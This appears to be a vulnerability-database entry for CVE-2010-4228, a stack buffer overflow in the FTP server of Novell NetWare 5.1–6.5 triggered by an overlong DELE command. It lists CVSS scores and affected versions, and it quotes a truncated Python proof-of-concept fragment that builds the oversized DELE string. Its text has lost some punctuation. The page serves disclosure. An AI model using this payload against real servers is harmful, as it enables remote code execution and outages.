9
CVSSv2

CVE-2010-4228

Published: 22/03/2011 Updated: 17/08/2017
CVSS v2 Base Score: 9 | Impact Score: 10 | Exploitability Score: 8
VMScore: 905
Vector: AV:N/AC:L/Au:S/C:C/I:C/A:C

Vulnerability Summary

Stack-based buffer overflow in NWFTPD.NLM prior to 5.10.02 in the FTP server in Novell NetWare allows remote authenticated users to execute arbitrary code or cause a denial of service (abend) via a long DELE command, a different vulnerability than CVE-2010-0625.4.

Vulnerability Trend

Vulnerable Product Search on Vulmon Subscribe to Product

novell netware 5.1

novell netware 6.0

novell netware 6.5

Exploits

#!/usr/bin/python import socket, sys # Source: # wwwprotekresearchlabcom/indexphp?option=com_content&view=article&id=25&Itemid=25 host = (sysargv[1]) data = "\x44\x45\x4c\x45\x20\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41\x3f\x41 ...
Novell Netware version 65 SP8 suffers from a NWFTPDNLM DELE remote code execution vulnerability Proof of concept code is included ...